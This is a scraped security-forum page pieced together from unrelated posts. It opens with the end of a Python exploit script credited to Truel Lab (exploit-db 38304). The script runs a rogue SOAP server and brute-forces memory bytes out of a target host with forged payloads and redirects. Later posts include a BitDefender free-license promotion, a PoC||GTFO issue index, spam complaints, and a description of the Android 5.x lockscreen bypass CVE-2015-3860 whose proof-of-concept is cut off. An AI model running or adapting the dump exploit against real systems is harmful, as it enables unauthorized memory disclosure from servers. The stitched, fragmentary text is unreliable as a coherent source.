    global dumped
    global current_dump
    global brute_index
    global address
    global in_string
    dumped = str(value) + str(dumped)
    if (string):
        current_dump = str(value) + str(current_dump)
    else:
        current_dump = ""
    in_string = string
    address = address - 1
    brute_index = 0
    print "[" + hex(address) + "] " + str(value)
    return


def bruteViaResponse(sock):
    global brute_index
    current_try = ""
    response_ok = r_ok + r_body
    for n in range(19):
        connection, request = getSoapRequest(sock)
        if not request:
            connection.close()
            return False
        if request.find("owned") != -1:
            pushDumped(getDumpedFromHost(request), True)
            sendSoapResponse(connection, response_ok)
            return True
        else:
            if ((brute_index+1) == len(brute_list)):
                sendSoapResponse(connection, response_ok)
                return False
            brute_index = brute_index + 1
            if not in_string:
                current_try = brute_list[brute_index]
            else:
                current_try = brute_list[brute_index] + str(current_dump)
            # redirect the SoapClient to the next guess
            response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
            sendSoapResponse(connection, response_re)
    connection, request = getSoapRequest(sock)
    if request.find("owned") != -1:
        pushDumped(getDumpedFromHost(request), True)
        sendSoapResponse(connection, response_ok)
        return True
    sendSoapResponse(connection, response_ok)
    return False


def bruteViaRequest(sock):
    global brute_index
    brute_index = 0
    current_try = ""
    while (True):
        if (brute_index == len(brute_list)):
            pushDumped(".", False)
        if limitReached(dumped):
            printDumped(dumped)
            return
        if not in_string:
            current_try = brute_list[brute_index]
        else:
            current_try = brute_list[brute_index] + str(current_dump)
        payload = forgePayload(current_try, address)
        thread.start_new_thread(sendPayload, (payload, ""))
        if not bruteViaResponse(sock):
            brute_index = brute_index + 1
    return


def runExploit():
    print "[+] Starting exploit"
    sock = serverStart()
    prepareForExploit()
    print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
    bruteViaRequest(sock)
    sock.close()
    print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
    sys.exit(0)


runExploit()

Source: https://www.exploit-db.com/exploits/38304/
-
LinkOfDeath.com - when it will catch you it will kill you('r tab)
-
The vn5socks guy: I got tired of how many times I banned him, and just let him spam in one topic. Edit: I banned them, but I can already picture new posts in 2-3 hours. Eh, at least it helps with SEO. I think.
-
BitDefender Internet Security 2016 – 6-month FREE license!
By Radu FaraVirusi(com) on September 21, 2015

BitDefender has launched the BitDefender 2016 product range, which brings a few notable changes. You can now get a FREE 6-month license for BitDefender Internet Security 2016.

Protection against ransomware (malware that locks the PC and demands a ransom to unlock it) has been added; it acts as a shield against unknown applications accessing personal documents. The BitDefender engine has been improved with what they call "machine learning-based technologies", allowing it to detect new threats faster than ever. The firewall has been rewritten and has improved performance. The password manager, parental control, file encryption and anti-theft modules have also been changed.

To get the FREE license, go to: Get 6 Months Free Of Bitdefender! The Best Protection Against Cyber-Threats.

Source: BitDefender Internet Security 2016 – 6 luni licenta GRATUITA!
-
Let us know if you find out more about the CERT event. Will it be technical? I think it'll be "general awareness". The Provision one can be described in a single word: SALES. Owasp will be interesting.
-
Yeah, it's not worth it. It's not for us.
-
9:2 A Sermon on Newton and Turing
9:3 Globalstar Satellite Communications
9:4 Keenly Spraying the Kernel Pools
9:5 The Second Underhanded Crypto Contest
9:6 Cross VM Communications
9:7 Antivirus Tumors
9:8 A Recipe for TCP/IPA
9:9 Mischief with AX.25 and APRS
9:10 Napravi i ti Računar „Galaksija“
9:11 Root Rights are a Grrl's Best Friend!
9:12 What If You Could Listen to This PDF?
9:13 Oona's Puzzle Corner!
Link: https://www.alchemistowl.org/pocorgtfo/pocorgtfo09.pdf
-
Android 5.x Lockscreen Bypass (CVE-2015-3860)
Posted on September 15, 2015 by jgor

A vulnerability exists in Android 5.x <= 5.1.1 (before build LMY48M) that allows an attacker to crash the lockscreen and gain full access to a locked device, even if encryption is enabled on the device. By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen. At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein.

September 2015: Elevation of Privilege Vulnerability in Lockscreen (CVE-2015-3860)

The attack requires the following criteria:
Attacker must have physical access to the device
User must have a password set (pattern / pin configurations do not appear to be exploitable)

Proof-of-concept – Nexus 4 factory image 5.1.1 (build LMY48I):

Source: Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office